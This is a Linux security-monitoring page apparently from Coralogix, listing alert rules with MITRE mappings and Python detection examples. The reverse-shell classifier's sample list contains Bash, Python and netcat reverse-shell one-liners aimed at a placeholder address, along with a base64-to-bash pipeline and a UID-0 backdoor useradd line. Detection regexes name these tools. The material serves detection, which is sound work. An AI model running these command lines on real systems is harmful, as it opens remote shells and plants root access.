Quick Start Security for Linux

Coralogix Extension For Linux Includes:

Alerts - 16

Stay on top of Linux key performance metrics. Keep everyone in the know with integration with Slack, PagerDuty and more.

Anomalous Data Transferred

This alert triggers whenever anomalous data transfer activity takes place within a short interval on a Linux system using command-line tools such as wget, scp, rsync, ftp and sftp. Wget is a command-line tool for downloading files over HTTP, HTTPS and FTP. SCP copies files between two hosts over SSH, so the transfer is authenticated and encrypted. Rsync is a command-line tool that synchronizes two directories, whether local or remote. FTP is the traditional file transfer protocol; it sends credentials and data in clear text. SFTP (SSH File Transfer Protocol, often expanded as "Secure File Transfer Protocol") is an alternative to FTP that runs over SSH and so adds authentication and encryption.

Impact: After a threat actor gains initial access to a Linux system, they can use these tools to download scripts and tooling for persistence or privilege escalation, or to exfiltrate data from the system.

Mitigation: Check whether the user is aware of the transfers. If not, investigate further: the remote hosts involved, the file names and sizes, and what was executed afterwards.

MITRE Tactic: TA0011 MITRE Technique: T1105

Action Performed on Command History

This alert triggers whenever an action is performed on the file containing the bash command history (~/.bash_history) on a Linux system, for example viewing, editing or deleting it. Note: the threshold for this alert is set to 3 events in 20 minutes. You can modify this threshold as per your requirements.

Impact: After completing an attack on a Linux system, attackers may delete or edit the command history to remove their tracks and avoid detection. Note that an attacker can also avoid writing history in the first place (for example by unsetting HISTFILE or running history -c in the live session), which file-access monitoring will not see; process execution logging covers that gap.

Mitigation: Validate that the action was authorized and that the user is aware of it. If not, investigate further.

MITRE Tactic: TA0005 MITRE Technique: T1070 MITRE Sub-Technique: 003

Kernel Module Activity Observed

This alert triggers whenever kernel module activity such as loading or unloading a module (insmod, modprobe, rmmod, or the init_module/finit_module/delete_module system calls) is observed on a Linux system.

Impact: Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the running kernel on demand. A threat actor may load a malicious module, and configure it to load at boot, to execute code with the highest operating system privilege; used this way an LKM is a kernel-mode rootkit that can hide processes, files and network connections from user-space tools.

Mitigation: Check whether the module-related commands were run legitimately by the user. If not, unload the module, preserve a copy of it for analysis, and investigate further. Kernel module signature enforcement and setting kernel.modules_disabled=1 after boot limit what an attacker can load.

MITRE Tactic: TA0003 MITRE Technique: T1547 MITRE Sub-Technique: 006

OS Credentials Dumping Attempted

This alert triggers whenever someone attempts to view or dump the contents of the /etc/passwd or /etc/shadow files on a Linux system.

Impact: A threat actor may dump the password hashes stored in /etc/shadow to crack them offline. Note that /etc/passwd is world-readable by design and is read by almost every process that resolves a user name, so detections on it need tuning (for example, limiting to interactive commands such as cat, or to copies sent off the host); /etc/shadow is readable only by root (and, on Debian-based systems, the shadow group), so any read by another account is significant.

Mitigation: Check whether the user who accessed these files is authorized to do so. If not, investigate further. Additionally, administrators should follow best practices in restricting access to privileged accounts so that hostile programs cannot reach such sensitive information.

MITRE Tactic: TA0006 MITRE Technique: T1003 MITRE Sub-Technique: 008
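The four alerts above (data transfer tools, command history access, kernel module activity and credential file access) are all the same shape: a predicate over host events plus a per-user count inside a time window. The following is an added example of that logic, written for this page and not taken from the Coralogix extension; the event lines are constructed and pre-joined into key=value pairs (real auditd splits SYSCALL and PATH records across lines), and every threshold except the page's "3 in 20 minutes" for history access is an assumption. /etc/passwd is deliberately left out of the credential rule because of the noise described above.

```python
import re
from collections import defaultdict, deque

# Constructed sample: one pre-joined event per line. Real auditd output splits
# SYSCALL and PATH records across lines and correlates them by serial number;
# the fields below are what a rule sees after that join.
SAMPLE_EVENTS = """\
ts=1700000000 uid=1000 comm=wget syscall=execve path=/tmp/stage1.sh
ts=1700000020 uid=1000 comm=scp syscall=execve path=/tmp/dump.tgz
ts=1700000040 uid=1000 comm=rsync syscall=execve path=/home/alice
ts=1700000050 uid=1000 comm=curl syscall=execve path=/tmp/stage2
ts=1700000100 uid=1000 comm=cat syscall=openat path=/home/alice/.bash_history
ts=1700000200 uid=1000 comm=rm syscall=unlinkat path=/home/alice/.bash_history
ts=1700000300 uid=1000 comm=vim syscall=openat path=/home/alice/.bash_history
ts=1700000400 uid=1000 comm=cat syscall=openat path=/etc/shadow
ts=1700000500 uid=0 comm=insmod syscall=finit_module path=/lib/modules/unknown.ko
ts=1700009000 uid=1001 comm=wget syscall=execve path=/tmp/report.pdf
"""

KV_RE = re.compile(r"(\w+)=(\S+)")
TRANSFER_TOOLS = {"wget", "curl", "scp", "rsync", "ftp", "sftp"}
KERNEL_MODULE_SYSCALLS = {"init_module", "finit_module", "delete_module"}

# (rule name, predicate, threshold, window in seconds). Thresholds are assumed
# for this example except "3 in 20 minutes", which the page states for history.
RULES = [
    ("anomalous_data_transfer",
     lambda e: e.get("syscall") == "execve" and e.get("comm") in TRANSFER_TOOLS,
     3, 60),
    ("command_history_action",
     lambda e: e.get("path", "").endswith("/.bash_history"),
     3, 20 * 60),
    ("os_credential_dump",          # /etc/passwd omitted: NSS reads it constantly
     lambda e: e.get("path") in ("/etc/shadow", "/etc/gshadow"),
     1, 1),
    ("kernel_module_activity",
     lambda e: e.get("syscall") in KERNEL_MODULE_SYSCALLS,
     1, 1),
]


def parse_event(line):
    event = dict(KV_RE.findall(line))
    event["ts"] = int(event["ts"])
    return event


def evaluate(lines, rules=RULES):
    """Return (rule, uid, ts) each time a rule's per-uid count first reaches
    its threshold inside the sliding window. Counting per uid keeps one
    user's scripted transfers from masking another user's activity."""
    windows = defaultdict(deque)  # (rule, uid) -> timestamps still in window
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        for name, matches, threshold, window in rules:
            if not matches(event):
                continue
            key = (name, event.get("uid"))
            seen = windows[key]
            seen.append(event["ts"])
            while seen and event["ts"] - seen[0] > window:
                seen.popleft()
            if len(seen) == threshold:  # fire once, when the threshold is hit
                alerts.append((name, event.get("uid"), event["ts"]))
    return alerts


if __name__ == "__main__":
    for rule, uid, ts in evaluate(SAMPLE_EVENTS):
        print(f"{ts} uid={uid} {rule}")
```

Running it on the sample yields four alerts: the transfer burst from uid 1000 fires on the third tool within a minute (the lone wget from uid 1001 does not), the history rule fires on the third touch of ~/.bash_history, and the /etc/shadow read and the module load fire immediately.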

SSH Authorized Keys Usage Observed

This alert triggers whenever a user authenticates with SSH keys on a Linux system. An SSH key pair consists of a public key and a private key. The server trusts a key when the public half is listed in the account's authorized_keys file; a client that holds the matching private key can then log in as that account without a password.

Impact: After a threat actor gains initial access to a Linux system, they can either read private keys stored on the host and use them to authenticate to other systems, or write their own public key into an authorized_keys file they can modify in order to keep access. If root's private key is readable, or root's authorized_keys file is writable, this allows an attacker to escalate privileges to root.

Mitigation: Validate that the key-based login is legitimate. If not, investigate further. Additionally, make sure that no copies of private keys are distributed and that private keys are readable only by their owner (mode 0600). The authorized_keys file should only be writable by the owner of the account or by root; sshd refuses to use it otherwise when StrictModes is enabled (the default).

MITRE Tactic: TA0003 MITRE Technique: T1098 MITRE Sub-Technique: 004
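The mitigation above comes down to file modes and ownership in ~/.ssh. The check below is an added example for this page, not part of the Coralogix extension: it builds a constructed ~/.ssh in a temporary directory (with a group-writable authorized_keys and a world-readable private key when weak=True) and reports what an attacker could abuse. The policy it applies (no group/world write on the directory or authorized_keys, owner must be the account or root, private keys 0600) is the one stated in the text.

```python
import os
import shutil
import stat
import tempfile
from pathlib import Path


def is_private_key(path: Path) -> bool:
    """PEM and OpenSSH private keys start with '-----BEGIN ... PRIVATE KEY-----'."""
    try:
        with path.open("rb") as fh:
            head = fh.read(64)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN") and b"PRIVATE KEY" in head


def check_ssh_dir(ssh_dir: Path, account_uid: int) -> list:
    """Findings for one account's ~/.ssh, in a fixed order: directory, then
    authorized_keys, then every private key found in the directory."""
    findings = []
    dir_mode = stat.S_IMODE(ssh_dir.stat().st_mode)
    if dir_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{ssh_dir}: directory writable by group/others ({dir_mode:04o})")
    authorized = ssh_dir / "authorized_keys"
    if authorized.exists():
        st = authorized.stat()
        mode = stat.S_IMODE(st.st_mode)
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{authorized}: writable by group/others ({mode:04o}); "
                            "anyone who can write it can add a key")
        if st.st_uid not in (account_uid, 0):
            findings.append(f"{authorized}: owned by uid {st.st_uid}, "
                            f"expected {account_uid} or root")
    for path in sorted(ssh_dir.iterdir()):
        if path.is_file() and is_private_key(path):
            mode = stat.S_IMODE(path.stat().st_mode)
            if mode & 0o077:
                findings.append(f"{path}: private key accessible to group/others "
                                f"({mode:04o}); expected 0600")
    return findings


def build_fixture(weak: bool) -> Path:
    """Constructed ~/.ssh in a temp dir; weak=True plants two misconfigurations."""
    home = Path(tempfile.mkdtemp(prefix="ssh-check-"))
    ssh_dir = home / ".ssh"
    ssh_dir.mkdir()
    os.chmod(ssh_dir, 0o700)
    pub = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedNotARealKey alice@host\n"
    priv = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            "constructed-not-a-real-key\n"
            "-----END OPENSSH PRIVATE KEY-----\n")
    (ssh_dir / "authorized_keys").write_text(pub)
    os.chmod(ssh_dir / "authorized_keys", 0o664 if weak else 0o600)
    (ssh_dir / "id_ed25519").write_text(priv)
    os.chmod(ssh_dir / "id_ed25519", 0o644 if weak else 0o600)
    (ssh_dir / "id_ed25519.pub").write_text(pub)
    os.chmod(ssh_dir / "id_ed25519.pub", 0o644)  # the public half may be world-readable
    return ssh_dir


def scan_fixture(weak: bool = True) -> list:
    """Build the fixture, check it as the current account, and clean up."""
    ssh_dir = build_fixture(weak)
    try:
        return check_ssh_dir(ssh_dir, os.getuid())
    finally:
        shutil.rmtree(ssh_dir.parent, ignore_errors=True)


if __name__ == "__main__":
    for finding in scan_fixture(weak=True):
        print(finding)
```

Pointed at a real account (check_ssh_dir(Path.home() / ".ssh", os.getuid())) the same function reports the weak authorized_keys and private-key modes an attacker would look for first; run it for root and for every service account that has a home directory.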

System Time Changed

This alert triggers whenever the system date and time are changed.

Impact: A threat actor may alter the clock on a Linux system so that its log timestamps no longer line up with those of other systems, which hampers correlation and timeline reconstruction, and so that time-based checks (certificate validity, Kerberos tickets, token expiry) behave unexpectedly. Disabling or breaking NTP synchronization has the same effect.

Mitigation: Validate that the action was authorized. If not, revert the change, restore time synchronization, and investigate further.

MITRE Tactic: TA0005 MITRE Technique: T1070

Data Encoding Observed

This alert triggers whenever data encoding with base64 is observed on a Linux system (for example, a base64 invocation in process execution / execve events).

Impact: A threat actor may encode payloads and command and control traffic to make their content harder to detect; a typical pattern is an encoded script decoded with base64 -d and piped straight into a shell or interpreter.

Mitigation: base64 is also used by many legitimate scripts and packaging tools, so validate whether the observed encoding has a legitimate reason. If not, investigate further; decoding the observed data usually reveals the intent quickly.

MITRE Tactic: TA0011 MITRE Technique: T1132

Ubuntu UFW Firewall Disabled

This alert triggers when the Ubuntu firewall (ufw) is disabled and is in an inactive state.

Impact: An adversary may disable the firewall on an Ubuntu machine to avoid detection and to bypass the network restrictions it enforces, for example to reach a listener they have started. Note that ufw disable is persistent: it is recorded in /etc/ufw/ufw.conf and the firewall stays off after a reboot.

Mitigation: Investigate the cause behind disabling the firewall and check with the user who performed this action. Make sure to enable the firewall again (ufw enable) and confirm with ufw status.

MITRE Tactic: TA0005 MITRE Technique: T1562 MITRE Sub-Technique: 004

PAM Configuration Modified

This alert triggers when a user modifies pluggable authentication module (PAM) configuration on a Linux machine. Linux PAM is a suite of libraries that allows a system administrator to configure how users are authenticated. It provides a flexible and centralized way to switch authentication methods for applications by editing configuration files (under /etc/pam.d and /etc/security) instead of changing application code.

Impact: Adversaries may modify authentication mechanisms and processes to capture user credentials or to enable otherwise unwarranted access to accounts, for example by inserting pam_permit.so into an auth stack, allowing empty passwords, or loading a trojanized module.

Mitigation: Check whether the user is aware of the modification of the PAM files. If not, revert the action, compare the files against a known-good baseline or package checksums, and investigate further.

MITRE Tactic: TA0006 MITRE Technique: T1556 MITRE Sub-Technique: 003
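Knowing that a PAM file changed is the alert; knowing whether the change is dangerous is the triage. The following added example (written for this page, not Coralogix code) parses pam.d-style stacks, flags the three tampering patterns named above, and fingerprints the effective configuration so a known-good baseline can be compared with what is deployed. Both stacks are constructed, and the module allowlist is an assumption that would be site-specific in practice.

```python
import hashlib
import re

# Constructed /etc/pam.d/sshd-style stacks. PAM_TAMPERED plants three changes an
# attacker might make; PAM_BASELINE is the known-good version kept for comparison.
PAM_BASELINE = """\
#%PAM-1.0
auth     required   pam_env.so
auth     required   pam_unix.so try_first_pass
auth     required   pam_deny.so
account  required   pam_unix.so
password required   pam_unix.so sha512 shadow
session  required   pam_limits.so
"""

PAM_TAMPERED = """\
#%PAM-1.0
auth     required   pam_env.so
auth     sufficient pam_permit.so
auth     required   pam_unix.so nullok try_first_pass
auth     required   pam_deny.so
account  required   pam_unix.so
password required   pam_unix.so sha512 shadow
session  required   pam_limits.so
session  optional   pam_exec.so seteuid /tmp/.cache/hook.sh
"""

# Assumed allowlist of modules expected in this stack (site-specific in practice).
KNOWN_MODULES = {"pam_env.so", "pam_unix.so", "pam_deny.so", "pam_permit.so",
                 "pam_limits.so", "pam_exec.so", "pam_faillock.so", "pam_systemd.so"}
TRUSTED_SCRIPT_PREFIXES = ("/usr/", "/etc/")

# type  control  module  [args...]; control may be a [bracketed] expression.
ENTRY_RE = re.compile(
    r"^(?P<type>-?(?:auth|account|password|session))\s+"
    r"(?P<control>\[[^\]]*\]|\S+)\s+"
    r"(?P<module>\S+)(?:\s+(?P<args>.*))?$")


def parse_pam(text):
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"type": m["type"].lstrip("-"),
                            "control": m["control"],
                            "module": m["module"].rsplit("/", 1)[-1],
                            "args": (m["args"] or "").split()})
    return entries


def audit_pam(text):
    """(rule, explanation) pairs in file order."""
    findings = []
    for e in parse_pam(text):
        mod, ctl = e["module"], e["control"]
        if e["type"] == "auth" and mod == "pam_permit.so" and (ctl == "sufficient" or ctl.startswith("[")):
            findings.append(("auth_bypass", f"{ctl} pam_permit.so short-circuits the auth stack"))
        if mod == "pam_unix.so" and "nullok" in e["args"]:
            findings.append(("empty_passwords_allowed", "pam_unix.so nullok accepts empty passwords"))
        if mod == "pam_exec.so":
            script = next((a for a in e["args"] if a.startswith("/")), None)
            if script and not script.startswith(TRUSTED_SCRIPT_PREFIXES):
                findings.append(("pam_exec_untrusted_path", f"pam_exec.so runs {script} on every {e['type']} event"))
        if mod not in KNOWN_MODULES:
            findings.append(("unknown_module", f"{mod} is not in the allowlist"))
    return findings


def fingerprint(text):
    """Hash of the effective configuration (comments and spacing ignored), so a
    baseline taken from a clean host can be compared with the deployed file."""
    canonical = "\n".join(" ".join([e["type"], e["control"], e["module"], *e["args"]])
                          for e in parse_pam(text))
    return hashlib.sha256(canonical.encode()).hexdigest()


if __name__ == "__main__":
    for rule, why in audit_pam(PAM_TAMPERED):
        print(f"{rule}: {why}")
    print("baseline matches:", fingerprint(PAM_BASELINE) == fingerprint(PAM_TAMPERED))
```

The fingerprint ignores comments on purpose: an attacker who only adds a comment has not changed authentication, while one who reorders or inserts a line has, and the hash reflects exactly that.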

Critical Bash Commands Used

This alert triggers when critical bash commands such as cat, rm, nc, ncat, netcat, cryptcat, useradd, trap and grep are run on a Linux machine.

Impact: Attackers commonly use these commands to achieve various objectives, from staging tools and creating accounts to opening network listeners and destroying data. Because several of them (cat, rm, grep) are also among the most common commands in normal use, this alert is noisy by design; tune it by user, host or command arguments, and weight the network and account commands higher.

Mitigation: Check whether the user is aware of the commands executed. If not, investigate further.

MITRE Tactic: TA0002 MITRE Technique: T1059 MITRE Sub-Technique: 004

Reverse Shell Command Executed

This alert triggers whenever a Python or Bash reverse shell command is executed in a Linux environment.

Impact: A reverse shell makes the compromised host open an outbound connection to a listener the attacker controls and attaches a shell to it. Because the connection is outbound, it passes inbound firewall rules, and the attacker gets an interactive shell with the privileges of the user that ran the command, which is enough to stage further attacks and often to take over the machine.

Mitigation: Check whether the user is aware of the command executed. If not, isolate the host, identify the remote address and port, and investigate further for subsequent malicious activity in the network. See the following link to learn more about reverse shells and mitigation techniques: https://www.imperva.com/learn/application-security/reverse-shell/

MITRE Tactic: TA0002 MITRE Technique: T1059 MITRE Sub-Technique: 004 (Unix Shell) / 006 (Python)
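The three command-line alerts above (Data Encoding, Critical Bash Commands and Reverse Shell) differ mainly in fidelity, and a practitioner wants them ranked rather than treated alike. The following added example, written for this page and not part of the Coralogix extension, classifies command lines in one pass: reverse shell shapes and base64-decode-into-a-shell pipelines as high, the page's network and account commands as medium, and cat/rm/grep as low. The sample command lines are constructed (the 203.0.113.0/24 addresses are a documentation range) and the severity tiers are an assumption.

```python
import re
import shlex

# Constructed command lines as they would appear in auditd EXECVE records or
# shell audit logs. The 203.0.113.0/24 addresses are a documentation range.
SAMPLE_COMMANDS = [
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"203.0.113.5\",4444));"
    "[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/sh\")'",
    "echo aWQK | base64 -d | bash",
    "nc -e /bin/sh 203.0.113.5 4444",
    "rm -f /tmp/build.log && grep -r TODO src/",
    "useradd -m -o -u 0 backdoor",
    "ls -la /tmp",
]

# High-fidelity shapes of Bash, Python and netcat reverse shells.
REVERSE_SHELL_PATTERNS = [
    ("bash_dev_tcp", re.compile(r"/dev/(?:tcp|udp)/[\w.:-]+/\d+")),
    ("python_socket_shell", re.compile(
        r"socket\.socket\(.*(?:os\.dup2|pty\.spawn|subprocess\.(?:call|Popen))")),
    ("netcat_exec", re.compile(
        r"\b(?:nc|ncat|netcat|cryptcat)\b.*\s(?:-[a-zA-Z]*[ec]|--exec|--sh-exec)\b")),
    ("mkfifo_pipe_shell", re.compile(
        r"\bmkfifo\b.*\|\s*(?:\S*/)?(?:ba|da|z)?sh\b.*\|\s*(?:nc|ncat)\b")),
]
# base64-decoded data piped straight into an interpreter (Data Encoding, T1132).
ENCODED_EXEC_PATTERN = re.compile(
    r"\bbase64\s+(?:-d|--decode)\b[^|]*\|\s*(?:\S*/)?(?:sh|bash|dash|zsh|python3?|perl)\b")

# The page's "critical commands", split by how much signal they carry alone (assumed tiers).
HIGH_RISK_COMMANDS = {"nc", "ncat", "netcat", "cryptcat", "useradd", "trap"}
NOISY_COMMANDS = {"cat", "rm", "grep"}
SHELL_OPERATORS = {"|", "||", "&&", ";", "&"}


def command_names(line):
    """Basenames of every program in command position (start of line or after
    a pipe/list operator), with quoting respected so a ';' inside a quoted
    python -c payload does not start a new command."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        tokens = list(lexer)
    except ValueError:          # unbalanced quotes: fall back to a plain split
        tokens = line.split()
    names, expect_command = [], True
    for tok in tokens:
        if tok in SHELL_OPERATORS:
            expect_command = True
        elif expect_command:
            names.append(tok.rsplit("/", 1)[-1])
            expect_command = False
    return names


def classify(line):
    """(severity, rule) hits for one command line, highest fidelity first."""
    hits = []
    for name, pattern in REVERSE_SHELL_PATTERNS:
        if pattern.search(line):
            hits.append(("high", name))
    if ENCODED_EXEC_PATTERN.search(line):
        hits.append(("high", "base64_decode_to_shell"))
    for name in command_names(line):
        if name in HIGH_RISK_COMMANDS:
            hits.append(("medium", f"critical_command:{name}"))
        elif name in NOISY_COMMANDS:
            hits.append(("low", f"critical_command:{name}"))
    return hits


def scan(commands):
    report = {}
    for cmd in commands:
        hits = classify(cmd)
        if hits:
            report[cmd] = hits
    return report


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_COMMANDS).items():
        print(f"{hits[0][0]:6} {cmd[:60]}  {[rule for _, rule in hits]}")
```

On the sample, the Bash, Python and netcat reverse shells and the base64 pipeline come out high, the netcat line also gets a medium critical-command hit, useradd is medium, the rm/grep line is low only, and ls produces nothing; that ordering is what lets the noisy "critical command" alert coexist with the high-fidelity ones.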

Kernel Parameters Configuration File Modified

This alert triggers whenever a user changes kernel parameters on a Linux system using the sysctl command or by modifying the configuration files in the /etc/sysctl.d/ directory (or /etc/sysctl.conf).

Impact: Kernel parameters control runtime kernel behaviour, and a threat actor may relax hardening settings to make later steps easier, for example disabling ASLR (kernel.randomize_va_space), removing ptrace restrictions (kernel.yama.ptrace_scope), exposing kernel pointers (kernel.kptr_restrict), or enabling IP forwarding to pivot. Changes written to /etc/sysctl.d/ are reapplied at every boot, so the weakened state persists.

Mitigation: Check whether the modifications are legitimate. If the user is not aware of the activity, revert the values, compare the files against your hardening baseline, and investigate further.

MITRE Tactic: TA0003 MITRE Technique: T1547
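The mitigation above asks for a comparison against a hardening baseline; the following added example (for this page, not Coralogix code) does that comparison. It parses sysctl.d-style text the way sysctl --system reads it (leading '-' tolerated, '/' and '.' separators equivalent, later lines override earlier ones) and reports baseline keys that were weakened separately from keys that are simply not set. The baseline values and both configuration files are assumptions constructed for the example.

```python
import re

# Assumed hardening baseline for this example (not a Coralogix rule set). "eq"
# means the value must equal the target, "ge" that it must be at least the target.
BASELINE = {
    "kernel.randomize_va_space": ("eq", 2),  # full ASLR for stack, mmap and brk
    "kernel.yama.ptrace_scope": ("ge", 1),   # only descendants may be ptraced
    "kernel.kptr_restrict": ("ge", 1),       # hide kernel addresses in /proc
    "kernel.dmesg_restrict": ("eq", 1),      # dmesg needs CAP_SYSLOG
    "fs.protected_symlinks": ("eq", 1),      # blocks symlink races in sticky dirs
    "fs.protected_hardlinks": ("eq", 1),
    "net.ipv4.ip_forward": ("eq", 0),        # unless the host really is a router
}

# Constructed /etc/sysctl.d/99-hardening.conf after tampering: ASLR and ptrace
# restrictions switched off and forwarding enabled, other lines left intact.
WEAKENED_CONF = """\
# hardening baseline (constructed)
kernel.randomize_va_space = 0
kernel.yama.ptrace_scope = 0
net/ipv4/ip_forward = 1
fs.protected_symlinks = 1
fs.protected_hardlinks = 1
-kernel.kptr_restrict = 2
kernel.dmesg_restrict=1
"""

# The same file as it should look; dmesg_restrict is deliberately left unset to
# show that "not configured" is reported separately from "weakened".
HARDENED_CONF = """\
# hardening baseline (constructed)
kernel.randomize_va_space = 2
kernel.yama.ptrace_scope = 1
net.ipv4.ip_forward = 0
fs.protected_symlinks = 1
fs.protected_hardlinks = 1
-kernel.kptr_restrict = 2
"""

SETTING_RE = re.compile(r"^-?\s*(?P<key>[A-Za-z0-9_./-]+)\s*=\s*(?P<value>.*?)\s*$")


def parse_sysctl(text):
    """Key/value pairs as sysctl --system would apply them: lines starting with
    '#' or ';' are comments, a leading '-' only suppresses errors, '/' and '.'
    are equivalent separators, and a later line overrides an earlier one."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = SETTING_RE.match(line)
        if m:
            settings[m["key"].replace("/", ".")] = m["value"]
    return settings


def audit_sysctl(text, baseline=BASELINE):
    """Return (weakened, unset): baseline keys whose value fails the check, and
    baseline keys the file does not set at all (the kernel default applies)."""
    settings = parse_sysctl(text)
    weakened, unset = [], []
    for key, (op, want) in baseline.items():
        if key not in settings:
            unset.append(key)
            continue
        try:
            have = int(settings[key])
        except ValueError:
            weakened.append((key, settings[key], f"non-numeric, expected {op} {want}"))
            continue
        if (have == want) if op == "eq" else (have >= want):
            continue
        weakened.append((key, have, f"expected {'==' if op == 'eq' else '>='} {want}"))
    return weakened, unset


if __name__ == "__main__":
    weakened, unset = audit_sysctl(WEAKENED_CONF)
    for key, have, why in weakened:
        print(f"WEAKENED {key} = {have} ({why})")
    for key in unset:
        print(f"UNSET    {key}")
```

The on-disk files are only half the picture: the running values come from sysctl -a, and an attacker who ran sysctl -w without touching /etc/sysctl.d leaves the files clean but the kernel weakened until the next boot, so run the same audit over the live output as well.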

No Logs From Linux

This alert triggers if there are no logs in the last 12 hours for Linux in the customer account. Note: this alert should be configured for the relevant applications and subsystems.

Impact: Disabling logging is a tactic that adversaries may employ to avoid detection, cover their tracks, or impede incident response investigations; the same symptom can also be caused by a stopped agent, a full disk, or a broken network path.

Mitigation: Confirm that the host is up, that the logging agent is running and able to reach Coralogix, and that the application and subsystem names in the alert match what the host sends, so that monitoring in the Coralogix SIEM remains comprehensive.

MITRE Tactic: TA0005 MITRE Technique: T1562

Suspicious SSHD Errors Observed

This alert triggers whenever suspicious SSH / SSHD error messages are seen, that is, fatal or unusual errors that could be caused by exploitation attempts.

Impact: Suspicious SSHD (Secure Shell Daemon) errors on a Linux system can indicate attempts to exploit the service or to abuse SSH for lateral movement, and should be examined.

Mitigation: Investigate whether these error messages are due to legitimate operations. If not, investigate further for any malicious actions performed, including other activity from the same source addresses.

MITRE Tactic: TA0008 MITRE Technique: T1021 MITRE Sub-Technique: 004

Possible Buffer Overflow Attempt

This alert triggers whenever activity that looks like a buffer overflow attempt is observed. The alert checks for four common indicators of buffer overflow.

Impact: Buffer overflow attacks pose significant risks to the security, integrity and availability of Linux systems and the data they contain; a successful one typically means arbitrary code execution with the privileges of the affected process.

Mitigation: Check whether the user is aware of the commands executed. If not, investigate further.

MITRE Tactic: TA0001 MITRE Technique: T1190

Possible Password Spraying Attempt

This alert triggers whenever there is a possible password spraying attempt. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords that may satisfy the domain's complexity policy, and attempts logins with it against many different accounts. Spreading the attempts across accounts avoids the lockouts that would normally occur when brute forcing a single account with many passwords.

Impact: Adversaries may use a single password, or a small list of commonly used passwords, against many different accounts to acquire valid account credentials.

Mitigation: Check whether the login failures were a known activity. If not, investigate further for malicious activity, and in particular for a successful login from the same source IP address. Additionally, set account lockout policies after a certain number of failed login attempts, and enable multi-factor authentication, especially on externally facing services.

MITRE Tactic: TA0006 MITRE Technique: T1110 MITRE Sub-Technique: 003
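What distinguishes spraying from ordinary brute force is the ratio of distinct accounts to attempts per source, and the mitigation above asks for one more step: correlating a later successful login from the same address. The following added example (written for this page, not the Coralogix rule) does both over constructed sshd lines in syslog format. The window, the "5 distinct users" and "5 attempts" thresholds, and the year used to complete syslog timestamps are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in syslog format (what /var/log/auth.log or journald
# forward). 198.51.100.7 sprays five accounts and then logs in as bob;
# 192.0.2.10 hammers one account, which is brute force rather than spraying.
SAMPLE_AUTH_LOG = """\
Nov 14 10:00:01 web1 sshd[1234]: Failed password for invalid user admin from 198.51.100.7 port 51000 ssh2
Nov 14 10:00:03 web1 sshd[1235]: Failed password for root from 198.51.100.7 port 51001 ssh2
Nov 14 10:00:05 web1 sshd[1236]: Failed password for invalid user test from 198.51.100.7 port 51002 ssh2
Nov 14 10:00:08 web1 sshd[1237]: Failed password for alice from 198.51.100.7 port 51003 ssh2
Nov 14 10:00:12 web1 sshd[1238]: Failed password for bob from 198.51.100.7 port 51004 ssh2
Nov 14 10:00:30 web1 sshd[1240]: Accepted password for bob from 198.51.100.7 port 51005 ssh2
Nov 14 10:01:00 web1 sshd[1241]: Failed password for alice from 192.0.2.10 port 40000 ssh2
Nov 14 10:01:02 web1 sshd[1242]: Failed password for alice from 192.0.2.10 port 40001 ssh2
Nov 14 10:01:04 web1 sshd[1243]: Failed password for alice from 192.0.2.10 port 40002 ssh2
Nov 14 10:01:06 web1 sshd[1244]: Failed password for alice from 192.0.2.10 port 40003 ssh2
Nov 14 10:01:08 web1 sshd[1245]: Failed password for alice from 192.0.2.10 port 40004 ssh2
Nov 14 10:05:00 web1 sshd[1250]: Accepted publickey for deploy from 10.0.0.9 port 33000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")


def parse_auth_log(text, year=2024):
    """(timestamp, result, user, ip) per sshd auth line. Syslog timestamps
    carry no year, so one is assumed; only differences matter here."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_spraying(text, window_s=600, min_distinct_users=5, min_attempts=5):
    """Per source IP: 'password_spray' when failures inside the window span at
    least min_distinct_users accounts, 'brute_force' when min_attempts failures
    hit a single account. Sprays are enriched with any later successful login
    from the same source, which is the first thing to chase in an investigation."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, ip in parse_auth_log(text):
        (failures if result == "Failed" else successes)[ip].append((ts, user))

    findings = {}
    for ip, fails in failures.items():
        fails.sort()
        for i, (ts, _) in enumerate(fails):
            recent = [(t, u) for t, u in fails[: i + 1] if (ts - t).total_seconds() <= window_s]
            users = {u for _, u in recent}
            if len(users) >= min_distinct_users:
                logins = sorted({u for t, u in successes.get(ip, []) if t >= recent[0][0]})
                findings[ip] = {"kind": "password_spray", "distinct_users": len(users),
                                "attempts": len(recent), "successful_logins": logins}
                break
            if len(recent) >= min_attempts and len(users) == 1:
                findings[ip] = {"kind": "brute_force", "user": next(iter(users)),
                                "attempts": len(recent)}
                break
    return findings


if __name__ == "__main__":
    for ip, finding in detect_spraying(SAMPLE_AUTH_LOG).items():
        print(ip, finding)
```

On the sample, 198.51.100.7 is reported as a spray across five accounts followed by a successful login as bob, 192.0.2.10 as brute force against alice, and the deploy key login from 10.0.0.9 is not reported at all. In production the distinct-user threshold must be set with the fleet in mind: a spray that sends one attempt per host across many hosts only shows up when the counts are aggregated by source IP across all of them.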

Integration

